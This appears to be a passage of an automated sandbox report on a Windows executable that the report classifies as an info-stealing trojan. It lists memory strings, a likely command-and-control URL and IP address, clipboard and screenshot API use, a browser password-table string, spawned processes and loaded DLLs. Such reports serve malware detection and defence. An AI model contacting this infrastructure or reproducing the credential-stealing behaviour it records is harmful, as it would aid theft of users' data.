              Source: file.exe, 00000003.00000002.2192897295.000000000139C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://forbidstow.site/piDw
              Source: file.exe, 00000003.00000003.2172599012.0000000001395000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://forbidstow.site/tw
              Source: file.exe, 00000003.00000003.2147992648.000000000138D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://forbidstow.site/zo
              Source: file.exe, 00000003.00000003.2117769016.0000000003865000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2117686465.000000000386C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://forbidstow.site:443/api
              Source: file.exe, 00000003.00000003.2172599012.0000000001395000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.2150304942.000000000139C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.2130598412.000000000138D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://forbidstow.site:443/apil
              Source: file.exe, 00000003.00000003.2147992648.000000000138D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: file.exe, 00000003.00000003.2132206149.0000000003985000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: file.exe, 00000003.00000003.2132206149.0000000003985000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: file.exe, 00000003.00000003.2148108007.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.2147992648.000000000138D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
              Source: file.exe, 00000003.00000003.2148108007.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.2147992648.000000000138D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
              Source: file.exe, 00000003.00000003.2102801748.000000000389B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102843367.0000000003898000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102957593.0000000003898000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: file.exe, 00000003.00000003.2102801748.000000000389B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102843367.0000000003898000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102957593.0000000003898000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: file.exe, 00000003.00000003.2132206149.0000000003985000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: file.exe, 00000003.00000003.2132206149.0000000003985000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: file.exe, 00000003.00000003.2132206149.0000000003985000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: file.exe, 00000003.00000003.2132206149.0000000003985000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000003.00000003.2132206149.0000000003985000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: file.exe, 00000003.00000003.2132206149.0000000003985000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownHTTPS traffic detected: 104.21.41.39:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.39:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.39:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.39:443 -> 192.168.2.5:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.39:443 -> 192.168.2.5:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.39:443 -> 192.168.2.5:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.39:443 -> 192.168.2.5:49716 version: TLS 1.2
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00435210 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_00435210
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00435210 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_00435210
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004359B7 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_004359B7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA20B00_2_00BA20B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA10000_2_00BA1000
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA32600_2_00BA3260
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA63900_2_00BA6390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB25900_2_00BB2590
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BBD0B00_2_00BBD0B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAA8E00_2_00BAA8E0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC70E00_2_00BC70E0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB00300_2_00BB0030
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BBE0200_2_00BBE020
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD90060_2_00BD9006
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB60700_2_00BB6070
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BCC8700_2_00BCC870
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAE1C00_2_00BAE1C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAD1700_2_00BAD170
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA69700_2_00BA6970
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAB9500_2_00BAB950
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB11500_2_00BB1150
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB7AA00_2_00BB7AA0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA92E00_2_00BA92E0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BBD2E00_2_00BBD2E0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA92D00_2_00BA92D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAC2C00_2_00BAC2C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BBDA300_2_00BBDA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAA2200_2_00BAA220
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB52500_2_00BB5250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BDB2420_2_00BDB242
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA8B900_2_00BA8B90
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BADB800_2_00BADB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB73E00_2_00BB73E0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAF3D00_2_00BAF3D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA9BC00_2_00BA9BC0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAACB00_2_00BAACB0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BBB4E00_2_00BBB4E0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC5CE10_2_00BC5CE1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA84C00_2_00BA84C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA44100_2_00BA4410
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA7C000_2_00BA7C00
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BCE4490_2_00BCE449
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB85A00_2_00BB85A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BBCD600_2_00BBCD60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA7E000_2_00BA7E00
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAE6400_2_00BAE640
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAF7B00_2_00BAF7B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA97A00_2_00BA97A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BBBFA00_2_00BBBFA0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB57C00_2_00BB57C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BBAF100_2_00BBAF10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB6F500_2_00BB6F50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB4F400_2_00BB4F40
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004100C53_2_004100C5
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0042509D3_2_0042509D
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004101303_2_00410130
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0043A2E03_2_0043A2E0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0041D5AF3_2_0041D5AF
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004446203_2_00444620
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0042A6D03_2_0042A6D0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004268003_2_00426800
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0040F9703_2_0040F970
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0043A97E3_2_0043A97E
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0042EB603_2_0042EB60
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004010003_2_00401000
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004101183_2_00410118
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004431D03_2_004431D0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004331DE3_2_004331DE
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004291E03_2_004291E0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004241E03_2_004241E0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00442EB03_2_00442EB0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0040F2503_2_0040F250
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0040B2603_2_0040B260
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0040A2703_2_0040A270
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0043E2303_2_0043E230
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004432C03_2_004432C0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004012D53_2_004012D5
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0041E2983_2_0041E298
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004083403_2_00408340
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004013283_2_00401328
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0042C3E03_2_0042C3E0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004423803_2_00442380
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004433B03_2_004433B0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0042F4DD3_2_0042F4DD
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004294943_2_00429494
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004094BF3_2_004094BF
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0041F5103_2_0041F510
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004255A43_2_004255A4
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004335B03_2_004335B0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0042D6423_2_0042D642
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0042762D3_2_0042762D
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004386FE3_2_004386FE
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004226A03_2_004226A0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0042762D3_2_0042762D
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0040D7603_2_0040D760
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004417203_2_00441720
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004437203_2_00443720
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0040A7303_2_0040A730
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004294943_2_00429494
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0042B7D93_2_0042B7D9
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0042B7FE3_2_0042B7FE
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004428503_2_00442850
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0041482A3_2_0041482A
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004038E03_2_004038E0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004399403_2_00439940
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004079603_2_00407960
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004449203_2_00444920
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004319803_2_00431980
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0042AA403_2_0042AA40
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0042CA723_2_0042CA72
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00420A243_2_00420A24
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00421B403_2_00421B40
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0040DB203_2_0040DB20
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00415BD83_2_00415BD8
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00439BA03_2_00439BA0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00414BBF3_2_00414BBF
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00444C503_2_00444C50
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00434C603_2_00434C60
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0042AC043_2_0042AC04
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0043EC203_2_0043EC20
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0040ECC03_2_0040ECC0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00427CD23_2_00427CD2
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0041ECDE3_2_0041ECDE
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0040BD703_2_0040BD70
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00429D003_2_00429D00
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0040ADD03_2_0040ADD0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00432D803_2_00432D80
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00408DA03_2_00408DA0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00422E503_2_00422E50
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00416E103_2_00416E10
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0042BE103_2_0042BE10
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00442EB03_2_00442EB0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00406F603_2_00406F60
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00428F003_2_00428F00
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00408DA03_2_00408DA0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00426F823_2_00426F82
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00434F803_2_00434F80
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00441F803_2_00441F80
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00409F9C3_2_00409F9C
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00404FA03_2_00404FA0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00409FA83_2_00409FA8
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BA20B03_2_00BA20B0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BBD0B03_2_00BBD0B0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BAA8E03_2_00BAA8E0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BC70E03_2_00BC70E0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BB00303_2_00BB0030
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BBE0203_2_00BBE020
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BA10003_2_00BA1000
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BD90063_2_00BD9006
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BB60703_2_00BB6070
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BCC8703_2_00BCC870
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BAE1C03_2_00BAE1C0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BAD1703_2_00BAD170
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BA69703_2_00BA6970
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BAB9503_2_00BAB950
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BB11503_2_00BB1150
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BB7AA03_2_00BB7AA0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BA92E03_2_00BA92E0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BBD2E03_2_00BBD2E0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BA92D03_2_00BA92D0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BAC2C03_2_00BAC2C0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BBDA303_2_00BBDA30
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BAA2203_2_00BAA220
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BA32603_2_00BA3260
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BB52503_2_00BB5250
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BDB2423_2_00BDB242
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BA8B903_2_00BA8B90
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BA63903_2_00BA6390
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BADB803_2_00BADB80
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BB73E03_2_00BB73E0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BAF3D03_2_00BAF3D0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BA9BC03_2_00BA9BC0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BAACB03_2_00BAACB0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BBB4E03_2_00BBB4E0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BC5CE13_2_00BC5CE1
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BA84C03_2_00BA84C0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BA44103_2_00BA4410
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BA7C003_2_00BA7C00
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BCE4493_2_00BCE449
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BB85A03_2_00BB85A0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BB25903_2_00BB2590
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BBCD603_2_00BBCD60
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BA7E003_2_00BA7E00
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BAE6403_2_00BAE640
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BAF7B03_2_00BAF7B0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BA97A03_2_00BA97A0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BBBFA03_2_00BBBFA0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BB57C03_2_00BB57C0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BBAF103_2_00BBAF10
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BB6F503_2_00BB6F50
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BB4F403_2_00BB4F40
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00BCA628 appears 46 times
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 0040C8C0 appears 71 times
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 0041C2A0 appears 176 times
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00BD077C appears 34 times
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00BC1090 appears 106 times
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 152
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: .bss ZLIB complexity 1.0003314936926606
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/5@1/1
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00432088 CoCreateInstance,3_2_00432088
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6800:120:WilError_03
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2516
              Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\a047972f-5304-4ee1-8bc7-4ba6f6b95b1fJump to behavior
              Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000003.00000003.2102843367.0000000003867000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102660171.0000000003886000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2118190329.0000000003890000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: file.exeReversingLabs: Detection: 31%
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 152
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: file.exeStatic PE information: section name: .00cfg
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA6390 push eax; ret 0_2_00BA66C2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC124A push ecx; ret 0_2_00BC125D
